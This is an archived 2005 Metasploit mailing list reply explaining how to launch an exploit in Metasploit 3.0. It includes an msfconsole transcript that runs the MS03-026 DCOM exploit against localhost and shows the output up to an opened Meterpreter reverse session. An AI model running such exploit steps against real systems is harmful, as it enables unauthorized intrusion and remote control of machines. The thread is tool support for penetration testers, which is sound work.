Metasploit mailing list archives

Running a exploit in 3.0


From: mmiller at hick.org (mmiller at hick.org)
Date: Thu, 15 Dec 2005 13:16:36 -0600

On Fri, Dec 16, 2005 at 12:07:08AM +0500, vmukhi at vsnl.com wrote:
I have successfully installed Metasploit Framework 3.0 on Auditor a
Debain Linux version. Like in version 2.5 I run msfconsole, use a
exploit lsass, set the payload add_user, set RHOST, PASS and USER but
there is no exploit command in 3.0. How do I actually run the exploit.
Any help will be highly appreciated. 

Can you provide us with a transcript of your attempt?  It should look 
something like this.  I already had a few variables set prior to running
the exploit (like PAYLOAD and LHOST).

$ ./msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ msf v3.0
+ -- --=[ 44 exploits - 76 payloads
+ -- --=[ 7 encoders - 2 nops
       =[ 2 recon

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(windows/dcerpc/ms03_026_dcom) > set RPORT 12347
RPORT => 12347
msf exploit(windows/dcerpc/ms03_026_dcom) > save
Saved configuration to: /home/mmiller/.msf3/config
msf exploit(windows/dcerpc/ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:127.0.0.1[12347] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:127.0.0.1[12347] ...
[*] sending exploit ...
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.254.0.4:4444 -> 10.172.69.14:1206)

Loading extension stdapi...success.
meterpreter > 




Current thread: